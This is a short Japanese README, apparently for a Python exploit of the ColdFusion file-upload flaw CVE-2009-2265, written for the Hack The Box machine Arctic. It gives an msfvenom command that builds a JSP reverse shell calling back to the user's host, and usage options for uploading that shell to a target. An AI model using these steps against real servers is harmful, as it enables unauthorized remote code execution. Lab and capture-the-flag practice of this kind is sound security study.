
https://cvedetails.com/cve/CVE-2009-2265/ に基づく ColdFusion エクスプロイト
https://cvedetails.com/cve/CVE-2009-2265/ に基づく ColdFusion エクスプロイト
この特定の CVE のために Python スクリプトを用意した主な理由は、HTB のマシン Arctic を解こうとしたときに、同じ内容の Metasploit バージョンが自分ではうまく動かなかったためです。また、Python の練習を少しできるのも良かったからです。ただし、同じエクスプロイトの別の Python バージョンもあり、これは元々 Alexander Reid によって作成されたものなので、彼のバージョンを使いたい場合はそちらを利用してください。
使い方はとても簡単です:
ペイロードファイルを作成しておいてください
例: msfvenom を使用する場合:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
使い方: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
任意引数:
-h, --help このヘルプメッセージを表示して終了
-t TARGET ターゲット IP
-p PORT ターゲットポート
-f FILEPATH アップロードするシェルコードを含むファイルのパス
-b BASEPATH ColdFusion のベースパス